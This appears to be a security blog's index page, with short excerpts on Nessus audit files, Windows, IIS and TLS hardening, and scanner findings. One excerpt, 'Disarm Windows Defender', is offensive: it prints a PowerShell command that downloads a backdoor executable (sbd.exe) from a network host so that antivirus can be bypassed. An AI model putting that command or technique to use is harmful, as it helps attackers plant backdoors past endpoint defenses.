Compliance Scanning

Verify Permissions on files (Windows)

Objective: Changes to the permissions on files could block security settings from being applied. Changes to the permissions on files could leak sensitive information. Changes to the permissions on files could lead to a system compromise. Audit files. Manual audit with PowerShell: View the permission on the application log file with PowerShell: get-acl "C:\Windows\SYSTEM32\WINEVT\LOGS\application.evtx" | fl […]

PASSWORD_COMPLEXITY_UNSUPPORTED_ON_AGENT

Objective: Resolve the error “PASSWORD_COMPLEXITY_UNSUPPORTED_ON_AGENT” when running a Windows auditfile via a Nessus Agent.

MS KB2871997: Update to Improve Credentials Protection and Management

Nessus Output: Description: The remote host is missing one or more of the following Microsoft updates: KB2871997, KB2973351, KB2975625, KB2982378, KB2984972, KB2984976, KB2984981, KB2973501, or KB3126593. These updates are needed to improve the protection against possible credential theft. - For Windows 7 / 2008 R2 : KB2984972, KB2871997, KB2982378, and KB2973351 are required; also, KB2984976 […]

Check Windows Services with Nessus Auditfile

Objective: Monitor Windows Services with Nessus via auditfile

Advanced Audit Policy Configuration Settings (Windows)

Objective: Audit “Advanced Audit Policy Configuration Settings”; Hardening / Configuring “Advanced Audit Policy Configuration Settings”

User Right Assignments (Windows)

Objective: Audit “User Rights Assignment”; Hardening / Configuring “User Rights Assignment”

Disable TLSv1.0 (Windows)

Best practice for systems running IIS, part of Hardening IIS:

SSL Version 2 and 3 Protocol Detection

Nessus Output: Description: The remote service accepts connections encrypted using SSL 2.0 and/or SSL 3.0. These versions of SSL are affected by several cryptographic flaws. An attacker can exploit these flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected service and clients. NIST has determined that SSL 3.0 is no longer acceptable […]

Disable SSLv3 (Windows)

Best practice for systems running IIS, part of Hardening IIS:

SSL DROWN Attack Vulnerability (Decrypting RSA with Obsolete and Weakened eNcryption)

Nessus Output: Description: The remote host supports SSLv2 and therefore may be affected by a vulnerability that allows a cross-protocol Bleichenbacher padding oracle attack known as DROWN (Decrypting RSA with Obsolete and Weakened eNcryption). This vulnerability exists due to a flaw in the Secure Sockets Layer Version 2 (SSLv2) implementation, and it allows captured TLS […]

Disable SSLv2 (Windows)

Best practice for systems running IIS, part of Hardening IIS:

SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)

Nessus Output: Description: The remote host allows SSL/TLS connections with one or more Diffie-Hellman moduli less than or equal to 1024 bits. Through cryptanalysis, a third party may be able to find the shared secret in a short amount of time (depending on modulus size and attacker resources). This may allow an attacker to recover […]

Server Message Block (SMB) Protocol Version 1 Unspecified RCE

Nessus Output: Description: The remote Windows host supports Server Message Block (SMB) Protocol version 1. It is, therefore, affected by an unspecified remote code execution vulnerability that allows an unauthenticated, remote attacker to execute arbitrary code. Note that this vulnerability is one of multiple Equation Group vulnerabilities and exploits disclosed by a group known as […]

Distinguished-Name Condition Check for Nessus Audit file

Objective: Target your Nessus Auditfile checks to a specific OU or DC

SSL Weak Cipher Suites Supported

Objective: Resolve this finding

SSL RC4 Cipher Suites Supported (Bar Mitzvah)

Objective: Resolve this finding

SSL 64-bit Block Size Cipher Suites Supported (SWEET32)

Objective: Resolve this finding

Configure the 'SSL Cipher Suite Order' Group Policy Setting

Objective: Use only strong SSL Cipher Suites; Resolve ‘SSL 64-bit Block Size Cipher Suites Supported (SWEET32)’; Resolve ‘SSL RC4 Cipher Suites Supported (Bar Mitzvah)’

Nessus credentialed scan requirements

Objective: Perform a credentialed scan without errors

Check File integrity with Nessus (on Linux with md5sum and FILE_CHECK)

Objective: Monitor file integrity by generating a hash and verify it with Nessus

Check File integrity with Nessus (on Windows with Get-FileHash and AUDIT_FILEHASH_POWERSHELL)

Objective: Monitor file integrity by generating a hash and verify it with Nessus

Ensure ‘deployment method retail’ is set

Best practice for systems running IIS, part of Hardening IIS:

Ensure AES 256/256 Cipher Suite is enabled (Scored)

Best practice for systems running IIS, part of Hardening IIS:

Ensure AES 128/128 Cipher Suite is configured

Best practice for systems running IIS, part of Hardening IIS:

Ensure Triple DES Cipher Suite is configured

Best practice for systems running IIS, part of Hardening IIS:

Ensure RC4 Cipher Suites is disabled

Best practice for systems running IIS, part of Hardening IIS:

Ensure RC2 Cipher Suites is disabled

Best practice for systems running IIS, part of Hardening IIS:

Ensure DES Cipher Suites is disabled

Best practice for systems running IIS, part of Hardening IIS:

Ensure NULL Cipher Suites is disabled

Best practice for systems running IIS, part of Hardening IIS:

Ensure 'directory browsing' is set to disabled

Best practice for systems running IIS, part of Hardening IIS:

Ensure 'host headers' are on all sites

Best practice for systems running IIS, part of Hardening IIS:

IIS version condition check for Nessus Audit file

Objective: Target your Nessus Auditfile checks to a specific version of IIS.

Identify failed credentialed scans in Nessus / Security Center

Objective: Identify and remediate failed scans in Nessus / Security Center.

No Custom Errors implemented

Often, during a penetration test on web applications, we come up against many error codes generated from applications or web servers. It’s possible to cause these errors to be displayed by using particular requests, either specially crafted with tools or created manually. These codes are very useful to penetration testers during their activities, because […]

ASP.NET DEBUG enabled

Nikto Output: DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.

Excessive headers

You are probably going to find this issue in the manual browsing and spidering phase of your assessment and when performing the Fingerprint Web Server (Passive) and Fingerprint Web Server (Active) Tests.

The X-Content-Type-Options header is not set

Nikto Output: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

The X-XSS-Protection header is not defined

Nikto Output: The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

The site uses SSL and the Strict-Transport-Security HTTP header is not defined

Nikto Output: The site uses SSL and the Strict-Transport-Security HTTP header is not defined

Audit Domain based Group Policies

Objective: Group Policy Objects contain sensitive configuration information which can be viewed by default by at least all members of the Domain. Misconfigurations of Group Policy settings or its content can have a huge impact on the environment. A periodic audit is advised.

Audit and Configure Account Policies on Windows

Account Policies are settings related to: The Password Policy; The Account Lockout Policy

Verify Permissions on Group Policy Registry Keys

Objective: Changes to the permissions on group policy registry keys could block security settings from being applied. Audit these registry keys (and subkeys).

Link-Local Multicast Name Resolution (LLMNR) Detection

Nessus Output: Synopsis: The remote device supports LLMNR. Description: The remote device answered to a Link-local Multicast Name Resolution (LLMNR) request. This protocol provides a name lookup service similar to NetBIOS or DNS. It is enabled by default on modern Windows versions. Reported Risk factor by Nessus: None. In my opinion the severity should […]

FILE_ERROR_SHARE_CONNECT: an error happened while connecting to the remote share

Objective: Resolve error

Hardening Google Chrome (on Windows)

Steps to harden Google Chrome: Updating Google Chrome; Review best practices; Configure Group Policy settings

Verify HTTP response headers

Objective: Verify the HTTP Response headers of your Web Site/Apps.

Content-Type header missing

You are probably going to find this issue in the manual browsing and spidering phase of your assessment. Netsparker will also report this issue during your scanning phase.

X-Frame-Options header is not set

You are probably going to find this issue in the manual browsing and spidering phase of your assessment. Nessus will also report this issue during your scanning phase.

Password autocomplete in browser

You are probably going to find this issue in the manual browsing and spidering phase of your assessment. Nessus will also report this issue during your scanning phase.

Network daemons not managed by the package system

Nessus Output: Description: Some daemon processes on the remote host are associated with programs that have been installed manually. System administration best practice dictates that an operating system’s native package management tools be used to manage software installation, updates, and removal whenever possible.

SSH Weak MAC Algorithms Enabled

Nessus Output: Description: The remote SSH server is configured to allow either MD5 or 96-bit MAC algorithms, both of which are considered weak. Note that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.

SSH Server CBC Mode Ciphers Enabled

Nessus Output: Description: The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. Note that this plugin only checks for the options of the SSH server and does not check for vulnerable software versions.

SMB Enumeration

Tools … that can be used to perform SMB enumeration.

Netapp

Resources used for auditing and hardening of Netapp devices:

SolarWinds Virtualization Manager

Description: A virtualization manager is a virtualization environment management application that provides capabilities to create, edit, remove and monitor virtual machines. A virtualization manager provides a complete management solution for many different virtual machines simultaneously through a single application management console. A virtualization manager is also known as a virtual machine manager, a virtual machine […]

VRealize Automation

Description: VMware vRealize Suite is a software product suite designed to enable IT professionals to create and manage hybrid clouds. The vRealize Suite bundles existing management software, including IT Business Management Suite, vCloud Automation Center (vCAC), vCenter Operations Management Suite and vCenter LogInsight.

Nessus .audit file editor

Objective: I couldn’t find a script editor that recognizes the Nessus .audit file keywords and syntax so I’m working on a user defined language definition file for Notepad++.

Nessus Audit file conditions

You can use ‘if then else’ logic in your Nessus auditfile to: target your checks to specific applications, versions, roles/features, environments; check conditions that are required to run the check, for example the availability of commands, file/directory, service/daemon, open port, running executable, installed package etc.; minimize the number of auditfiles by implementing condition blocks.

Nessus Auditfile opening and closing tags

Starter templates for Nessus auditfile….

POWERSHELL_NO_RESULT: powershell command returned no result

Objective: Resolve the error condition “POWERSHELL_NO_RESULT: powershell command returned no result” in the Nessus auditfile for Windows.

POWERSHELL_REG_FAILURE: Could not determine powershell location in the registry

Objective: Resolve the error “POWERSHELL_REG_FAILURE: Could not determine powershell location in the registry” when running a compliance scan on Windows

Version check for installed software (Windows) with Nessus

Objective: Nessus has many plugins but it is not checking all applications that are installed. So we want to be able to create a simple version check with a Nessus auditfile for Windows applications.

Read .nessus file into Excel (with Power Query)

Objective: Read a .nessus file (hosts properties, vulnerability and compliance scan results) into Excel.

Cisco ACS

Nessus: Scanning a Cisco ACS with credentials (ssh) is currently not fully supported:

VMware Tools

Nessus: You can use Nessus to detect VMware Tools: Microsoft Windows Installed Software Enumeration (credentialed check) (20811); SNMP Query Installed Software Disclosure (19763). There are currently no version checking / vulnerability plugins. A manual vulnerability assessment is required.

MS15-011: Vulnerability in Group Policy Could Allow Remote Code Execution (3000483)

Nessus Output: KB 3000483 or a related, subsequent update was successfully installed, but the GPO setting "Hardened UNC Paths" has not been enabled.

MS KB2719662: Vulnerabilities in Gadgets Could Allow Remote Code Execution

Nessus Output: Nessus determined the workaround is not being used because the following registry value does not exist : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Windows\Sidebar\TurnOffSidebar

Microsoft Windows SMB Registry : Winlogon Cached Password Weakness

Nessus Description: The registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount is non-null. It means that the remote host locally caches the passwords of the users when they log in, in order to continue to allow the users to log in in the case of the failure of the PDC.

MS KB3009008: Vulnerability in SSL 3.0 Could Allow Information Disclosure (POODLE)

Nessus Output: The workaround to disable SSL 3.0 for all server software installed on the remote host has not been applied. The workaround to disable SSL 3.0 for all client software installed on the remote host has not been applied.

MS KB2960358: Update for Disabling RC4 in .NET TLS

Nessus Output: The following registry values have not been set to 1 :
- HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\SchUseStrongCrypto
- HKLM\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\SchUseStrongCrypto

MS15-124: Cumulative Security Update for Internet Explorer (3116180)

Nessus Output: ASLR hardening settings for Internet Explorer in KB3125869 have not been applied. The following DWORD keys must be created with a value of 1:
- HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_USER32_EXCEPTION_HANDLER_HARDENING\iexplore.exe
- HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_USER32_EXCEPTION_HANDLER_HARDENING\iexplore.exe

Microsoft XML Parser (MSXML) and XML Core Services Unsupported

Nessus Plugin Output: The remote host contains one or more unsupported versions of the Microsoft XML Parser (MSXML) or XML Core Services. Downloading and Installing Microsoft Core XML Services (MSXML) 6.0 does not fix this issue.

MS KB2269637: Insecure Library Loading Could Allow Remote Code Execution

Nessus Output: ntdll.dll has been upgraded by KB2264107 or a related, subsequent update, but the following registry entry has not been set : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CWDIllegalInDllSearch

Nessus Cloud

References Nessus Cloud Documentation Nessus Cloud Login Portal

Apple Mac OS X

References for developing Nessus auditfiles: Tenable Audit Policies – Apple Mac OS X Apple Mac OS X CIS Benchmarks

Tenable Security Center

References: Tenable Security Center Release Notes Tenable Security Center Product Page Tenable Security Center API Tenable Support Portal Tenable Discussion Forum Tenable Security Advisories Vulnerabilities: CVE Details

Nessus

References: Nessus Release Notes Nessus Support Portal Nessus Product Page Nessus Plugins Tenable Discussion Forum Tenable Security Advisories Vulnerabilities: CVE Details

CISCO

References used to develop Nessus Auditfiles for Cisco Devices:

SPLUNK

References used to develop Nessus Auditfiles for Splunk:

Tibco

References used to develop Nessus Auditfiles for Tibco Products:

Check Internet Explorer version

Objective: According to Microsoft's announcement, support for older versions of Internet Explorer ended on January 12th, 2016; you should verify your Windows systems against the latest Microsoft Support Lifecycle statements.

DB2

References used to develop Nessus Auditfiles for Oracle: Nessus sample auditfiles on Tenable Support Portal Tenable discussion forum CIS Benchmarks

ORACLE

References used to develop Nessus Auditfiles for Oracle:

Check Windows File Integrity with sfc and powershell

Objective: Use file integrity checking tools to ensure that critical system files (including sensitive system and application executables, libraries, and configurations) have not been altered. Critical Security Control #3: Secure Configurations for Hardware and Software – System 3.5. SFC and PowerShell: Windows contains a built-in utility called sfc to verify and fix Windows File Integrity […]

Hardening MS SQL

Best practices and references used for hardening MS SQL

LDAP

STIGs: CIS Benchmarks

DNS

STIGs: DNS Policy BIND DNS STIG Windows DNS CIS Benchmarks Nessus: Nessus Plugins for DNS

Active Directory

STIGS: Active Directory Domain Security Technical Implementation Guide (STIG); Active Directory Forest Security Technical Implementation Guide (STIG); Active Directory Service 2008 Security Technical Implementation Guide (STIG); Active Directory Service 2003 Security Technical Implementation Guide (STIG); Windows Server 2012 / 2012 R2 Domain Controller Security Technical Implementation Guide; Windows Server 2012 Domain Controller Security Technical Implementation […]

Audit XML configuration files

A quick example to query an XML config file to retrieve a specific security setting. PowerShell:
Select-Xml -path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config -XPath "/configuration/system.web/membership/providers/add" | Select-Object -ExpandProperty node | Select-Object passwordFormat
passwordFormat
--------------
Hashed

Disarm Windows Defender

When we try to download a backdoor program, Windows Defender will block the file.
Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"

Pingsweeps

A few code snippets to perform ping sweeps:

Hardening IIS

Best practices and references used for hardening IIS.

Cloud Security

Links: Security Guidance for Critical Areas of Focus in Cloud Computing : Cloud Security Alliance Cloud Computing Risk Assessment — ENISA NIST Cloud Computing 6 Security Reference Architecture Whitepaper Cloudcomputing | NCSC Cloud Controls Matrix : Cloud Security Alliance

Websphere MQ

Security Configuration Guides: CIS Benchmark – not available STIG – not available SCAP – not available Secure Messaging Scenarios with WebSphere MQ WebSphere MQ Security in an Enterprise Environment Known vulnerabilities: CVE Details Available Exploits: Exploit-DB

Apache Tomcat

Security Configuration Guides: CIS Benchmarks STIG – not available SCAP NIST – not available Apache Tomcat 7 – Security Considerations Apache Tomcat 8 – Security Considerations Apache Tomcat 9 – Security Considerations Vulnerabilities: Apache Tomcat Security Updates CVE Details Vulners Exploits: Available Exploits: Exploit-DB

Apache HTTP Server

Security Configuration Guides: CIS Benchmarks STIG SCAP NIST Apache HTTP Server 2.4 Security Tips Apache Hardening on securityweekly Apache HTTP Server Security Report Known vulnerabilities: CVE Details Available Exploits: Exploit-DB

Websphere Application Server

Security Configuration Guides: CIS Benchmark – not available STIG – not available SCAP – not available Redbook IBM Websphere Application Server v.7.0 Security Guide Redbook IBM Websphere Application Server v.8.0 Administration and Configuration Guide Redbook IBM Websphere Application Server v.8.5 Administration and Configuration Guide. Websphere Application Server includes IBM HTTP Server, which has its origins in Apache HTTP […]

Hardening JBoss

Best practices and references used for hardening JBoss.

STIGs

STIGs are Security Technical Installation Guides. I use the STIGs together with the product documentation to create and review security baselines and to develop Nessus Audit files. STIGs can be downloaded here: http://www.stigviewer.com

Critical Security Controls

The SANS Critical Security Controls can be used to prioritize your security policies.

CIS SECURITY BENCHMARKS

The CIS Security Benchmarks provide a good starting point for hardening your servers and applications. The latest CIS Security Benchmarks can be downloaded here. You can browse the available security Benchmarks here

ADOBE FLASH

Verify the flash version in your browser here

Hardening VMware

References used to harden and audit VMware

WINDOWS

References used to develop Nessus Auditfiles for Windows:

RED HAT ENTERPRISE LINUX

Resources used for creating custom Nessus Auditfile for Red Hat Enterprise:

'for loop' in a Linux Nessus audit file

I’m working on a custom Linux auditfile with Oracle checks. I want this audit file to be generic, so no hardcoded instance names in the auditfile.

Performing MS SQL Audit with Nessus

Issue: The default Nessus\CIS auditfiles for MS SQL are split up in OS level and Database level auditfiles. This results in at least 2 auditfiles per instance, which you have to schedule in 2 jobs. This is not a scalable solution.